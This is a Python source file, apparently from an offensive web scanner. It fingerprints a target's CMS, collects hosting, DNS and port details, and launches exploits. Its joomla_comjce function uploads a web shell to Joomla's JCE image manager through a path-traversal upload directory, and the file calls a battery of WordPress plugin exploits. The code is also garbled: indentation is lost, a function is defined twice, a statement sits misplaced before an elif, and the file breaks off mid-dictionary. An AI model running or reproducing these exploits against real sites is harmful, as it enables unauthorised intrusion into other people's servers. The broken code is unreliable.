def webhosting_info(hostinfo):
print (' %s Web Hosting Information' % (run))
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
getinfo = vxget(urldate,headers,timeout)
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date,getinfo)
if matches:
print ( ' %s Domain Created on : %s' % (good,matches.group(1)))
ip = socket.gethostbyname(hostd(url))
print ( ' %s CloudFlare IP : %s' % (good,ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
getipinfo = vxget(ipinfo,headers,timeout)
country = re.search(re.compile(r'country\": \"(.+?)\"'),getipinfo)
region = re.search(re.compile(r'region\": \"(.+?)\"'),getipinfo)
latitude = re.search(re.compile(r'latitude: (.+?)'),getipinfo)
longitude = re.search(re.compile(r'longitude\": \"(.+?)\"'),getipinfo)
timezone = re.search(re.compile(r'timezone\": \"(.+?)\"'),getipinfo)
ans = re.search(re.compile(r'ans\": \"(.+?)\"'),getipinfo)
org = re.search(re.compile(r'org\": \"(.+?)\"'),getipinfo)
if country:
print(' %s Country : %s' % (good,country.group(1)))
if region:
print(' %s Region : %s' % (good,region.group(1)))
if latitude:
print(' %s Latitude : %s' % (good,latitude.group(1)))
if longitude:
print(' %s Longitude : %s' % (good,longitude.group(1)))
if timezone:
print(' %s Timezone : %s' % (good,timezone.group(1)))
if ans:
print(' %s Ans : %s' % (good,ans.group(1)))
if org:
print(' %s Org : %s' % (good,org.group(1)))
print ("-----------------------------------------------")
def dnsdumper(url):
domain = hostd(url)
dnsdumpster_url = 'https://dnsdumpster.com/'
response = requests.Session().get(dnsdumpster_url).text
csrf_token = re.search(r"name='csrfmiddlewaretoken' value='(.*?)'",
response).group(1)
print(' %s Retrieved token: %s' % (que, csrf_token))
cookies = {'csrftoken': csrf_token}
headers = {'Referer': 'https://dnsdumpster.com/'}
data = {'csrfmiddlewaretoken': csrf_token, 'targetip': domain}
response = requests.Session().post('https://dnsdumpster.com/',
cookies=cookies,
data=data,
headers=headers)
image = requests.get('https://dnsdumpster.com/static/map/%s.png' % domain)
if response.status_code == 200:
soup = BeautifulSoup(response.content, 'html.parser')
tables = soup.findAll('table')
res = {}
res['domain'] = domain
res['dns_records'] = {}
res['dns_records']['dns'] = results(tables[0])
res['dns_records']['mx'] = results(tables[1])
res['dns_records']['txt'] = text_record(tables[2])
res['dns_records']['host'] = results(tables[3])
print(' %s looking for dns-servers' % (que))
print(res['dns_records']['dns'])
print(' %s looking for mx-records' % (que))
print(res['dns_records']['mx'])
def webhosting_info():
print('%s [~] Web Hosting Information %s' % (Y, W))
urldate = "https://input.payapi.io/v1/api/fraud/domain/age/" + hostd(url)
getinfo = vxget(urldate, headers, 3)
regex_date = r'Date: (.+?)-(.+?)'
regex_date = re.compile(regex_date)
matches = re.search(regex_date, getinfo)
if matches:
print('%s [*] Domain Created on : %s' % (B, matches.group(1)))
ip = socket.gethostbyname(hostd(url))
print('%s [*] CloudFlare IP : %s' % (B, ip))
ipinfo = "http://ipinfo.io/" + ip + "/json"
getipinfo = vxget(ipinfo, headers, 3)
country = re.search(re.compile(r'country\": \"(.+?)\"'), getipinfo)
region = re.search(re.compile(r'region\": \"(.+?)\"'), getipinfo)
if country:
print('%s [*] Country : %s' % (B, country.group(1)))
if region:
print('%s [*] Region : %s' % (B, region.group(1)))
def joomla_comjce(url, headers, timeout):
ip = socket.gethostbyname(hostd(url))
headers[
'User-Agent'] = 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801'
endpoint = url + "/index.php?option=com_jce&task=plugin&plugin=imgmanager&file=imgmanager&method=form&cid=20"
data = {
'upload-dir': './../../',
'upload-overwrite': 0,
'Filedata': [open('./shell/VulnX.gif', 'rb')],
'action': 'Upload'
}
content = vxpost(endpoint, data, headers, timeout)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((url, 80))
path_shell = url + "/VulnX.gif"
res = requests.get(path_shell, headers)
if re.findall(r'/image/gif/', res):
print(' %s Com Jce %s %s' %
(que, vulnexploit, path_shell))
else:
print(' %s Com Jce %s' % (que, failexploit))
def detect_cms():
id = 0
lm = url + '/smiley/1.gif'
lm_content = vxget(lm, headers)
lm2 = url + '/rss.xml'
lm2_content = vxget(lm2, headers)
content = vxget(url, headers)
# try:
############################
# #
# joomla #
# #
############################
#joomla searching content to detect.
if re.search(
re.compile(
r'<script type=\"text/javascript\" src=\"/media/system/js/mootools.js\"></script>|/media/system/js/|com_content|Joomla!'
), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Joomla' % (good, W, end))
print('------------------------------------------------')
#webinfo gathering argument
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
prestashop_version()
#port to scan
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
#joomla_exploits imported from folder[./common/joomla_exploits.py]
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
joomla_comjce(url, headers, timeout)
joomla_comedia(url, headers, timeout)
joomla_comjdownloads(url, headers, timeout)
joomla_comjdownloads2(url, headers, timeout)
joomla_fabrik2(url, headers, timeout)
joomla_fabrik2_d(url, headers, timeout)
joomla_foxcontact(url, headers, timeout)
############################
# #
# Wordpress #
# #
############################
#wordpress searching content to detect.
elif re.search(re.compile(r'wp-content|wordpress|xmlrpc.php'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Wordpress' % (good, W, end))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
if domaininfo:
domain_info(subdomains)
#wp_grab methods info from (folder)[./common/grapwp.py]
if cms == 'version':
print(' %s Check CMS Info' % (run))
wp_version(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'themes':
print(' %s Check CMS Info' % (run))
wp_themes(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'user':
print(' %s Check CMS Info' % (run))
wp_user(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'plugins':
print(' %s Check CMS Info' % (run))
wp_plugin(url, headers, grabinfo)
print("-----------------------------------------------")
if cms == 'all':
print(' %s Check CMS Info' % (run))
wp_version(url, headers, grabinfo)
wp_themes(url, headers, grabinfo)
wp_user(url, headers, grabinfo)
wp_plugin(url, headers, grabinfo)
print("-----------------------------------------------")
#port to scan
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %sPORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
# vulnx -u http://example.com -e | vulnx -u http://example --exploit
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
#wp_exploit methods from (dolder)[./common/wp_exploits.py]
wp_wysija(url, headers, timeout, vulnresults)
wp_blaze(url, headers, timeout, vulnresults)
wp_synoptic(url, headers, timeout, vulnresults)
wp_catpro(url, headers, timeout, vulnresults)
wp_cherry(url, headers, timeout, vulnresults)
wp_dm(url, headers, timeout, vulnresults)
wp_fromcraft(url, headers, timeout, vulnresults)
wp_jobmanager(url, headers, timeout, vulnresults)
wp_showbiz(url, headers, timeout, vulnresults)
wp_shop(url, headers, timeout, vulnresults)
wp_powerzoomer(url, headers, timeout, vulnresults)
wp_revslider(url, headers, timeout, vulnresults)
wp_adsmanager(url, headers, timeout, vulnresults)
wp_inboundiomarketing(url, headers, timeout, vulnresults)
wp_adblockblocker(url, headers, timeout, vulnresults)
wp_levoslideshow(url, headers, timeout, vulnresults)
print("-----------------------------------------------")
############################
# #
# Drupal #
# #
############################
#drupal searching content to detect.
elif re.search(re.compile(r'Drupal|drupal|sites/all|drupal.org'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Drupal' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
drupal_version()
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Prestashop #
# #
############################
#prestashop searching content to detect.
elif re.search(re.compile(r'Prestashop|prestashop'), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s %sCMS :%s Prestashop' % (good, W, end))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
prestashop_version()
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# OpenCart #
# #
############################
#opencart searching content to detect.
elif re.search(
re.compile(
r'route=product|OpenCart|route=common|catalog/view/theme'),
content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : OpenCart' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Magento #
# #
############################
#magento searching content to detect.
elif re.search(
re.compile(
r'Log into Magento Admin Page|name=\"dummy\" id=\"dummy\"|Magento'
), content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Magento' % (good))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
if cms == 'version':
print(' %s Check CMS Info' % (run))
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
if exploit:
print(' %s Check Vulnerability\n' % (run))
print(""" %sNAME %sSTATUS %sSHELL""" %
(W, W, W))
############################
# #
# Lokomedia #
# #
############################
#lokomedia searching content to detect.
print(' %s Check Vulnerability' % (run))
elif re.search(re.compile(r'image/gif'), lm_content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Lokomedia' % (good))
print('------------------------------------------------')
domain_info(subdomains)
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
print(' %s Check Vulnerability' % (run))
elif re.search(re.compile(r'lokomedia'), lm2_content):
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Lokomedia' % (good))
print('------------------------------------------------')
domain_info(subdomains)
if scanports:
print(' %s Scanning Ports\n' % (run))
print(""" %s PORTS %sSTATUS %sPROTO""" %
(W, W, W))
portscan(hostd(url))
print("-----------------------------------------------")
print(' %s Check Vulnerability' % (run))
############################
# #
# Unknown #
# #
############################
#no cms detect
else:
print('%s Target[%i] -> %s%s \n\n ' % (W, id, url, end))
print('------------------------------------------------')
print(' %s looking for cms' % (que))
print(' %s CMS : Unknown' % (bad))
print('------------------------------------------------')
if webinfo:
webhosting_info(hostinfo)
#domain gatherinargument
if domaininfo:
domain_info(subdomains)
signal.signal(signal.SIGINT, signal_handler)
#main
if __name__ == "__main__":
if url:
#url condition entrypoint
root = url
if root.startswith('http'):
url = root
else:
url = 'http://' + root
#default headers.
headers = {
'Host': hostd(url),
'User-Agent': random_UserAgent(),
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',
}
detect_cms()
if dorks:
headers = {
'host': 'google.com',
'User-Agent': random_UserAgent(),
'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Connection': 'keep-alive',